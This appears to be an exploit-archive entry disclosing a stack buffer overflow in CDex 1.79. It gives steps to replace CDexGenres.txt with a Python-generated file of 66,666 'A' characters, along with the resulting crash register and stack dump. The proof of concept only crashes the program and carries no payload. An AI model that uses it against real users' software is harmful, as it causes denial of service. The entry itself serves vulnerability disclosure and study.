CDex Genre 1.79 - Stack Buffer Overflow



EKU-ID: 5162 CVE: OSVDB-ID:
Author: Un_N0n Published: 2015-10-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


'''
********************************************************************************************
# Exploit Title: CDex Genre Stack Buffer Overflow
# Date: 10/9/2015
# Exploit Author: Un_N0n
# Software Link: http://cdex.mu/download
# Version: 1.79
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- Generate a File by python code mentioned below.
2- Goto C:\Users\YourUsername\AppData\Local\CDex\LocalCDDB
3- Replace the Old CDexGenres.txt with New CDexGenres.txt which is
   Produced by Python Code.
4- Open Up CDex.exe.
~Software will crash.
 
On Further Analysis, We come to know that it is Stack-based-BOF.
 
[REG-DUMP]:
EAX 00000000
ECX 779DD018 ASCII "\r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n" //May be handled but yet application crashes.
EDX 0012F1A1 ASCII 0A,"STATUS_STA"
EBX 00749338 CDex.00749338
ESP 0012F3E8
EBP 0012F464
ESI 00000000
EDI 002C7AC8
 
EIP 779DCE96 kernel32.779DCE96
 
0012F3F4   002C7AC8
0012F3F8   002E25F8  ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F3FC   002E5FD8
0012F400   002E44A0
0012F404   000003F8
0012F408   0000007F
0012F40C   0012F504
0012F410   00260000
0012F414   77C97B89  RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong
0012F418   002E2580  ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F41C   00001190
'''
 
[Code to produce CDexGenres.txt]
buffer = "A"*66666
file = "CDexGenres.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
**********************************************************************************************
'''